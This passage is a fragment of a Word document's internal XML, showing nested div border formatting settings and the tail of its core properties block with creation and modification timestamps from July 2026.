                    <w:right w:val="none" w:sz="0" w:space="0" w:color="DEDEDE"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1829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5" w:color="DEDEDE"/>
                        <w:left w:val="none" w:sz="0" w:space="8" w:color="DEDEDE"/>
                        <w:bottom w:val="none" w:sz="0" w:space="5" w:color="DEDEDE"/>
                        <w:right w:val="none" w:sz="0" w:space="8" w:color="DEDEDE"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="21306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07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9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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-12T12:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-12T12:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>